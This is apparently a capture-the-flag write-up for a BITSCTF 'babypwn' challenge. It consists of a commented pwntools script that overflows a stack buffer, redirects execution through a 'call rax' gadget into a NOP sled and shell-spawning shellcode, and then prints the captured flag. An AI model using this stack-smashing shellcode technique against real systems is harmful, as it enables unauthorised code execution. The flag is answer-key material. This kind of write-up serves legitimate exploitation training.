dplastico

babypwn

a baby:

#!/usr/bin/env python3

from pwn import *

# Target binary (the patched copy shipped with the challenge).
elf = ELF("./main_patched")

# `binary` lets pwntools derive arch/bits/endianness from the target;
# `terminal` is only used to open the GDB pane when run with the GDB flag.
context.update(binary=elf, terminal=["tmux", "splitw", "-hp", "70"])
# Set to "debug" to dump every byte that crosses the tube while developing.
# context.log_level = "debug"

# GDB script handed to gdb.debug() when the GDB flag is used (see start()).
gs = "\ncontinue\n"
def start():
    """Open the target tube selected by the pwntools command-line flags.

    REMOTE takes precedence over GDB: with REMOTE set, connect to the
    challenge service; with GDB set, launch the binary under gdb with the
    ``gs`` script; otherwise run it as a plain local process.
    """
    if args.REMOTE:
        return remote("chals.bitskrieg.in", 6001)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)

r = start()  # the tube (remote / gdb / local) that every helper below talks through

def rcu(d1, d2=0):
    """Receive up to delimiter ``d1`` (discarded); optionally keep reading.

    When ``d2`` is given (truthy), the bytes between ``d1`` and ``d2`` are
    returned with ``d2`` itself dropped. With the default ``d2=0`` nothing is
    returned (None).
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log the libc base address.

    NOTE(review): ``libc`` is never defined in this script (only ``elf``
    is), so calling this raises NameError -- it is an unused template
    leftover.
    """
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log a leaked value as ``<name> = 0x...``."""
    return log.info(name + " = %#x" % val)


def sa(delim, data):
    """Send ``data`` once ``delim`` has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send ``line`` plus a newline once ``delim`` has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send ``line`` followed by a newline."""
    return r.sendline(line)


def bc(value):
    """ASCII-encode ``str(value)`` so it can be written to the tube."""
    return str(value).encode("ascii")


def demangle_base(value):
    """Shift a page-number-sized value back up into an address (<< 12)."""
    return value << 0xc


def remangle(heap_base, value):
    """XOR ``value`` with ``heap_base >> 12`` (presumably glibc safe-linking
    style pointer mangling; unused in this script)."""
    return (heap_base >> 0xc) ^ value

#========= exploit here ===================

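# Stack-smash layout implied by the payload below (not shown on this page;
# confirm in GDB): 0x70 bytes of input buffer, 8 bytes of saved rbp, then the
# saved return address. Any one of NX, a stack canary or PIE would defeat
# this as written, so the challenge binary presumably ships without them.
# (A ROP(elf) object used to be built here but was never used; dropped.)
callrax = 0x0000000000401014  # call rax; fixed address -> non-PIE binary (assumed)

# Presumably rax still holds a pointer to the input buffer when the
# vulnerable function returns, which is why `call rax` lands in the sled.
# TODO confirm in the debugger.
sled = b"\x90" * 0x10          # NOP sled: tolerates small offsets in where rax points
shellcode = asm(shellcraft.sh())
body = sled + shellcode
# The original silently produced a broken layout if sled+shellcode outgrew
# the buffer (negative repeat count -> empty padding); fail loudly instead.
if len(body) > 0x70:
    raise ValueError(
        f"sled+shellcode is {len(body)} bytes, larger than the 0x70-byte buffer"
    )
payload = body.ljust(0x70, b"A")  # pad up to the saved-rbp slot
payload += b"B" * 8               # filler for the saved rbp slot
payload += p64(callrax)           # return address -> gadget

sl(payload)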

#========= interactive ====================
r.interactive()  # hand the tube to the user so the spawned shell can be driven by hand
#BITSCTF{w3lc0m3_70_7h3_w0rld_0f_b1n4ry_3xpl01t4t10n_ec5d9205}